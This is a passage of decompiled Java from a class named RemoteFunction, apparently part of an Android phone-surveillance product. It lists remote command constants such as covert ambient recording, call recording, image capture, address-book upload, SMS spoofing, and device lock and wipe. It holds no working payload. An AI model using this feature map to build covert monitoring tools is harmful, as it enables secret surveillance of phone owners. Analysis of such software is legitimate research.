    localRemoteFunction2 = DEBUG_PRODUCT_VERSION;
    localObject[80] = localRemoteFunction2;
    localRemoteFunction2 = DEBUG_IS_CALLRECORDING_SUPPORTED;
    localObject[81] = localRemoteFunction2;
    localRemoteFunction2 = DEBUG_IS_RESUME_ON_DEMAND_AMBIENT_RECORDING;
    localObject[82] = localRemoteFunction2;
    localRemoteFunction2 = SET_MODE_ADDRESS_BOOK;
    localObject[83] = localRemoteFunction2;
    localRemoteFunction2 = SEND_ADDRESS_BOOK;
    localObject[84] = localRemoteFunction2;
    localRemoteFunction2 = REQUEST_BATTERY_INFO;
    localObject[85] = localRemoteFunction2;
    localRemoteFunction2 = REQUEST_MEDIA_HISTORICAL;
    localObject[86] = localRemoteFunction2;
    localRemoteFunction2 = UPLOAD_ACTUAL_MEDIA;
    localObject[87] = localRemoteFunction2;
    localRemoteFunction2 = DELETE_ACTUAL_MEDIA;
    localObject[88] = localRemoteFunction2;
    localRemoteFunction2 = ON_DEMAND_AMBIENT_RECORD;
    localObject[89] = localRemoteFunction2;
    localRemoteFunction2 = ON_DEMAND_IMAGE_CAPTURE;
    localObject[90] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_CALL_RECORDING;
    localObject[91] = localRemoteFunction2;
    localRemoteFunction2 = SET_CALL_RECORDING_WATCH_FLAG;
    localObject[92] = localRemoteFunction2;
    localRemoteFunction2 = SET_CALL_RECORDING_AUDIO_SOURCE;
    localObject[93] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_COMMUNICATION_RESTRICTION;
    localObject[94] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_APP_PROFILE;
    localObject[95] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_URL_PROFILE;
    localObject[96] = localRemoteFunction2;
    localRemoteFunction2 = SPOOF_SMS;
    localObject[97] = localRemoteFunction2;
    localRemoteFunction2 = SET_PANIC_MODE;
    localObject[98] = localRemoteFunction2;
    localRemoteFunction2 = START_PANIC;
    localObject[99] = localRemoteFunction2;
    localRemoteFunction2 = STOP_PANIC;
    localObject[100] = localRemoteFunction2;
    localRemoteFunction2 = GET_PANIC_MODE;
    localObject[101] = localRemoteFunction2;
    localRemoteFunction2 = PANIC_IMAGE_CAPTURE;
    localObject[102] = localRemoteFunction2;
    localRemoteFunction2 = IS_PANIC_ACTIVE;
    localObject[103] = localRemoteFunction2;
    localRemoteFunction2 = ENABLE_ALERT;
    localObject[104] = localRemoteFunction2;
    localRemoteFunction2 = SET_LOCK_DEVICE;
    localObject[105] = localRemoteFunction2;
    localRemoteFunction2 = SET_UNLOCK_DEVICE;
    localObject[106] = localRemoteFunction2;
    localRemoteFunction2 = SET_WIPE;
    localObject[107] = localRemoteFunction2;
    localRemoteFunction2 = SYNC_TEMPORAL_APPLICATION_CONTROL;
    localObject[108] = localRemoteFunction2;
    a = (RemoteFunction[])localObject;
  }
}


/* Location:              /Volumes/D1/codebase/android/POC/assets/product/maind/classes-enjarify.jar!/com/vvt/remotecontrol/RemoteFunction.class
 * Java compiler version: 5 (49.0)
 * JD-Core Version:       0.7.1
 */